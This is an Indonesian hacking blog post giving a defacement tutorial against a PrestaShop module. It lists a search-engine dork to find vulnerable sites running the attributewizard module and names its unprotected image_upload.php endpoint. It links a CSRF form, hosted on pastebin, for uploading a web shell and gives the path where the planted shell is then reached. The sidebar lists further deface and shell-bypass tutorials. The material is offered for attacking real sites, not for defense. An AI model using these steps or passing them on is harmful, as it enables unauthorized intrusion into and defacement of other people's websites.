Pages

Thursday, October 20, 2016

Pretashop Attribute Upload

 

   Entah gua  perenang atau bukan yang jelas gua suka nyelam :D
kali ini gua mau kasih  turtor, namanya pretashop attribute upload.
langsung aja nih step by step
pertama copy dork di mesin pencarian lu.
lalu  lu klik images biar makin banyak yang vuln

dork:inurl:/modules/attributewizard
kemudian masukan exploitnya jadi
:www.site.co.id/modules/attributewizard/image_upload.php
Exploit:/modules/attributewizard/image_upload.php

kalo ada bacaan error berarti vuln,
lalu upload shell lu, gimana ? gak ada tombol browse ? ya pake csrf lah :v
csrf http://pastebin.com/ZXg8hJLQ copy csrf di notepad dengan ekstensi, html
masukan taget, lalu pilih shell, kalo ada bacaan succes berarti berhasil :v
cara manggilnya
www.site.com/modules/attributewizard/img/id_group_.php
nama file lu jadi (id_group_.php)  .php tergantung ekstensi lu kalo lu tanam html jadi (id_group_.html)
Sekian turtor dari gua, :D









Next
Prev Post
Previous
Next Post
LosCardosMandoza

About LosCardosMandoza

Author Description here.. Nulla sagittis convallis. Curabitur consequat. Quisque metus enim, venenatis fermentum, mollis in, porta et, nibh. Duis vulputate elit in elit. Mauris dictum libero id justo.

No comments:
Write comments

Labels

Subscribe to Newsletter

Popular Posts

  • Registration Upload
                 Rasanya udah seminggu gua belum buka blog, untung ada waktu gua sempatin buat buka dan sesambil mau posting yang udah gak asing...
  • Kae's File Manager
     Kali ini gua akan ngeshare tutorial  deface dengan KFM (Kae's File Manager) Dork: inurl:/kfm/uploads          inurl:/plugins/kfm/    ...
  • Tools Deface Script
    Kali ini gua akan share Tools Deface gua masukin dalam satu script, untuk fiture lumayan banyak Kalo kurang atau ada yang error perbaiki aja...
  • Hidden Script in Image
        Kali ini gua mau sharing tentang bagaimana cara deface dengan ngumpetin script di gambar, mungkin udah banyak yang tau, tapi mungking pe...
  • Global Network Shell
        Sebenarnya entah kurang kerjaan atau kurang greget, gara gara mati lampu tadi malem sampe page hehe jadi gua sibukan aja untuk edit edi...
  • Cara Deface Dengan Teknik OJS ( Open Journal Systems )
                     Halo Sob .. Oke Kali ini saya akan Share Cara Deface website OJS ( Open Journal Systems ) Ada Yg Tau apa Itu OJS?  ...
  • Bypass Ekstensi Shell
    " Cara Bypass Ekstensi Shell yang Tidak Bisa di Tamper Data " Teknik Bypass Ekstensi Shell : 1 . Upload Shell Dengan Eksten...
  • Bypass Admin With Email
    Sebelumnya terimakasih ke pada bang evelyn :D (GSH) Hallow Gans :* Oke saya akan posting lagi. Pertama nya saya coba coba , Lalu saya ketagi...
  • Dorking Nazuka Dengan Neighbors
                 Kali ini gua akan share bagaimana cara dorking website yang hosting di nazuka.net, sebenarnya sangat simple kita hanya butuh ...
  • Exploit Statics
    Pertama-tama masukan salah satu dork di site engine mu: Dork: kategori-22-politik.html site:com inurl:Statis-55 inurl:Statis-57 inurl:S...
© Copyright 2015 Global Network. Designed by Bloggertheme9. Powered by Blogger.